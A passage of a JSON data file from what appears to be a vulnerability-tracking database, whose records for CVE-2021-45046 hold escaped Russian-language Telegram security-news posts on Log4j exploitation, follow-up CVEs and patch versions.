\u0434\u043b\u044f \u043d\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0443, \u043d\u043e \u043f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0432\u044b\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u0434 \u0431\u043e\u043b\u0435\u0435 \u0430\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u043f\u0440\u0435\u0441\u043b\u0435\u0434\u0443\u044f \u043f\u043e\u0434\u0440\u044b\u0432\u043d\u044b\u0435 \u0446\u0435\u043b\u0438. \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Mandiant \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0441\u043e\u043e\u0431\u0449\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0442\u043e\u043c, \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0410\u0420\u0422 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n \n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 Check Point \u0441 44% \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 1,3 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u044b \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438. \u0412\u0441\u0435\u043e\u0431\u0449\u0438\u0439 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0430\u0436\u0438\u043e\u0442\u0430\u0436 \u0438 \u0445\u0430\u043e\u0441 \u0432\u043e \u0432\u0441\u0435\u043c \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043c\u0438\u0440\u0435 \u043d\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0442 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Wiz \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 89% \u0432\u0441\u0435\u0445 \u0441\u0440\u0435\u0434 \u0438\u043c\u0435\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0434\u0430\u0436\u0435 \u043d\u0435 \u0434\u043e\u0433\u0430\u0434\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u0431 \u044d\u0442\u043e\u043c. \u041d\u0430\u0441\u0442\u043e\u044f\u0449\u0430\u044f \u0447\u0435\u0440\u043d\u0430\u044f \u043f\u044f\u0442\u043d\u0438\u0446\u0430 \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439.\n \n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e Microsoft \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u044b Cobalt Strike, \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 Log4j, \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0449\u0435\u0433\u043e ransomware, \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0431\u043e\u043b\u0435\u0435 \u0443\u0432\u0435\u0441\u0438\u0441\u0442\u044b\u0435 \u0430\u043a\u0442\u043e\u0440\u044b \u0443\u0436\u0435 \u0432\u043e\u0432\u0441\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Log4 Jam, \u043d\u043e \u043f\u043e\u043a\u0430 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u0431\u043e\u043b\u0435\u0435 \u043d\u0430 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0448\u0438\u0440\u043e\u043a\u043e\u043c \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0435. \u0410 \u043f\u043e \u0438\u0441\u0442\u0435\u0447\u0435\u043d\u0438\u0438 \u043f\u0430\u0440\u044b \u0442\u0440\u043e\u0439\u043a\u0438 \u043d\u0435\u0434\u0435\u043b\u044c \u043c\u0435\u0441\u0442 \u043d\u0430 DLS, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0445\u0432\u0430\u0442\u0430\u0442\u044c, \u0447\u0442\u043e\u0431 \u0443\u043f\u043e\u0440\u044f\u0434\u043e\u0447\u0438\u0442\u044c \u0432\u0441\u0435\u0445 \u043d\u043e\u0432\u044b\u0445 \u0436\u0435\u0440\u0442\u0432 ransomware.\n \n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u043c\u043e\u043c\u0435\u043d\u0442\u0443 \u043f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u0435\u0440\u0435\u0434 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438 \u043f\u043e \u0418\u0411 \u0441\u0442\u043e\u0438\u0442 \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430: \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0432 \u0441\u0435\u0442\u0438.", "creation_timestamp": "2021-12-15T15:20:00.000000Z"}, {"uuid": "98a8192c-7823-4a6c-bef3-71fb2866f834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/true_secator/2459", "content": "\u200b\u200b\u0415\u0449\u0435 \u0440\u0430\u0437 Merry Christmas!\n \nLog4shell \u0432\u0441\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0442\u0441\u0442\u0443\u043f\u0438\u0442. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440, \u043a\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u0438\u043d\u043d\u0430\u044f \u044d\u043f\u043e\u043f\u0435\u044f \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 0-day \u0432 log4j, \u0434\u043b\u044f \u043c\u043d\u043e\u0433\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f 2.16 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0438\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438. \u041d\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u043e\u043d\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0431\u0430\u0433\u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u0432\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432\u0435\u0440\u0441\u0438\u0438 2.17.0.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u041f\u041e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS), \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2021-45105. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a 2.15.0 \u0431\u044b\u043b \u043f\u0440\u0438\u0437\u043d\u0430\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 DoS (CVE-2021-45046). \u041f\u043e\u0437\u0436\u0435 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u0431\u044b\u043b \u043f\u043e\u0432\u044b\u0448\u0435\u043d Apache \u0441 \u043d\u0438\u0437\u043a\u043e\u0433\u043e (3,7) \u0434\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e (9,0) \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u0445\u043e\u0434\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u043a\u0440\u0430\u0441\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n \n\u041f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0435\u0445 \u0434\u043d\u0435\u0439 Apache \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b \u043d\u043e\u0432\u0443\u044e CVE \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u043f\u0435\u0447\u0435\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e log4j 2.17.0.\n \nCVE-2021-45105 \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439 \u00ab\u0432\u044b\u0441\u043e\u043a\u0438\u0439\u00bb (7,5) \u0431\u0430\u043b\u043b \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 log4j 2.16 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 \u043d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0438 \u043f\u0440\u0438 \u0441\u0430\u043c\u043e\u0440\u0435\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u0435 JNDI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0431\u044b\u043b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2.16, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a \u043e\u0448\u0438\u0431\u043a\u0435 StackOverflowError. \u0412\u0435\u0440\u0441\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0430  \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u043c Java-\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 - Maven Central. \u0412\u044b\u043f\u0443\u0441\u043a 2.12.3 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0435\u0442\u043a\u0438 2.12.x.\n \n\u0410\u0431\u0441\u0442\u0440\u0430\u0433\u0438\u0440\u0443\u044f\u0441\u044c \u043e\u0442 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Google, \u0431\u043e\u043b\u0435\u0435 35 000 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 Java \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 log4j, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0435\u0435 8% \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f Maven Central. \u0411\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u044e\u0442 \u0431\u0430\u0433\u0438 log4j \u00ab\u043a\u043e\u0441\u0432\u0435\u043d\u043d\u043e\u00bb \u043f\u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u043e\u0439 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0437 35 863 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 Google \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u043e\u043a\u043e\u043b\u043e 7000 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 log4j \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 log4j \u0437\u0430\u0442\u044f\u043d\u0435\u0442\u0441\u044f \u043d\u0430 \u0433\u043e\u0434\u044b.\n \n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 log4j \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c Apache \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439.", "creation_timestamp": "2021-12-20T13:48:25.000000Z"}, {"uuid": "a9368966-9ab0-4825-a609-f28bed32f357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "Telegram/QbzltGTL5MLooH2kEl1qS06h23oJX4UpKYkbnKcssYleTA", "content": "", "creation_timestamp": "2022-01-03T05:49:38.000000Z"}, {"uuid": "0a9c21ca-4cae-4b8a-beeb-ffe941c944ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/NeKaspersky/1587", "content": "\u041a\u0442\u043e \u0442\u0443\u0442 \u0441\u0430\u043c\u044b\u0439 \u0441\u0438\u043b\u044c\u043d\u044b\u0439 \u0438 \u043a\u0440\u0443\u0442\u043e\u0439? \u0421\u0430\u043c\u0430\u044f \u0441\u0438\u043b\u044c\u043d\u0430\u044f \u0438 \u043a\u0440\u0443\u0442\u0430\u044f \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c log4j. \n\n\u0412 \u043f\u0440\u043e\u0448\u043b\u044b\u0439 \u0440\u0430\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Log4Shell, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 \u0432 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u0430\u0432\u0435\u043b\u0430 \u043c\u043d\u043e\u0433\u043e \u0448\u0443\u043c\u0430. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 2.15 \u0440\u0435\u0448\u0438\u043b\u043e \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u043d\u043e \u0442\u0443\u0442 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043e\u043d\u0430 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u0441\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u0435\u0440\u0441\u0438\u0438 2.15 \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043b\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u00ablog4j2.noFormatMsgLookup\u00bb \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b. \n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (Log4Shell, CVE-2021-44228) \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u0430 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u0435\u0433\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435\u043c \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0437-\u0437\u0430 \u0438\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432. \n\nCVE-2021-45046  \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b \u0437\u0430 \u0441\u0447\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433 \u0434\u0430\u043d\u043d\u044b\u0445. \u0422\u0435, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u043b\u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 JNDI, \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0438\u043b\u0438 MDC-\u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u044e\u0449\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433.\n\n\u0418 \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0440\u0435\u0448\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u0445\u043e\u0434\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f 2.16 \u0438 2.12.2, \u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u00ab\u043d\u043e\u0432\u0435\u043d\u044c\u043a\u0438\u0439\u00bb. \u0418\u043c\u044f \u0435\u043c\u0443 CVE-2021-45105, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c, \u043e\u0442\u043d\u0435\u0441\u043b\u0438 \u043a \u0442\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u043c, \u043d\u043e \u043d\u0435 \u0442\u0430\u043a\u0438\u043c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0432\u0438\u0434\u0435 